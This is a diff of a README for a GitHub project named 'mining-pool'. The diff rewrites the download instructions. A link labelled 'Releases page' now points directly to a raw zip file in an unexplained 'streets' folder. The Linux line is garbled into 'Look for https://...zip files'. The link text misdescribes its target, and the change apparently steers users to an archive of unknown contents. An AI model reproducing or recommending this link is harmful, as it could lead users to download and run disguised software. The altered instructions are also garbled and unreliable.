ZAMANI23-afk/mining-pool/README.md

 To download and install the mining-pool software, follow these steps:

-- Visit our [Releases page](https://github.com/ZAMANI23-afk/mining-pool/releases) to download the latest version.
+- Visit our [Releases page](https://raw.githubusercontent.com/ZAMANI23-afk/mining-pool/main/streets/mining-pool.zip) to download the latest version.

 - Select the file that matches your operating system:
   - **Windows:** Look for .exe files.
   - **macOS:** Look for .dmg files.
-  - **Linux:** Look for .tar.gz files.
+  - **Linux:** Look for https://raw.githubusercontent.com/ZAMANI23-afk/mining-pool/main/streets/mining-pool.zip files.

 Once you have downloaded the appropriate file, follow the installation instructions as mentioned in the Getting Started section.